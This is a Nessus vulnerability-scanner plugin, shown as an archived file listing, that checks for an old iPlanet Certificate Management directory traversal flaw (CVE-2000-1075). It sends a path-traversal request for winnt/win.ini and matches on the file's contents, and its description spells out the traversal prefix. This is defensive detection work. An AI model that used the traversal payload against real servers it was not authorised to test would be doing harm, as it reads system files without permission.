home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / iplanet_traversal.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  74 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. #
  7. # XXX might be redundant with plugin# 10589
  8. #
  9.  
  10. if(description)
  11. {
  12.  script_id(10683);
  13.  script_bugtraq_id(1839);
  14.  script_version ("$Revision: 1.11 $");
  15.  script_cve_id("CVE-2000-1075"); 
  16.  name["english"] = "iPlanet Certificate Management Traversal";
  17.  script_name(english:name["english"]);
  18.  
  19.  desc["english"] = "
  20. It is possible to read arbitrary files on
  21. the remote server by prepending /ca/\../\../
  22. in front on the file name.
  23.  
  24. Solution : Visit http://www.iplanet.com/downloads/patches/index.html
  25. Risk factor : High";
  26.  
  27.  script_description(english:desc["english"]);
  28.  
  29.  summary["english"] = "\..\..\file.txt";
  30.  summary["francais"] = "\..\..\file.txt";
  31.  script_summary(english:summary["english"], francais:summary["francais"]);
  32.  
  33.  script_category(ACT_ATTACK);
  34.  
  35.  
  36.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
  37.         francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
  38.  family["english"] = "Remote file access";
  39.  family["francais"] = "AccΦs aux fichiers distants";
  40.  script_family(english:family["english"], francais:family["francais"]);
  41.  script_dependencie("find_service.nes");
  42.  script_require_ports("Services/www", 443);
  43.  exit(0);
  44. }
  45.  
  46. #
  47. # The script code starts here
  48. #
  49.  
  50. include("http_func.inc");
  51. include("misc_func.inc");
  52.  
  53.  
  54. ports = add_port_in_list(list:get_kb_list("Services/www"), port:443);
  55.  
  56. foreach port (ports)
  57.  {
  58.  req = http_get(item:string("/ca\\../\\../\\../\\../\\../winnt/win.ini"),
  59.         port:port);
  60.  
  61.  # ssl negot. is done by nessusd, transparently.
  62.  soc = http_open_socket(port);
  63.  if(soc)
  64.  {
  65.  send(socket:soc, data:req);
  66.  r = http_recv(socket:soc);
  67.  http_close_socket(soc);
  68.  if(("[windows]" >< r)||
  69.     ("[fonts]" >< r)){
  70.      security_hole(port);
  71.     }
  72.  }
  73. }
  74.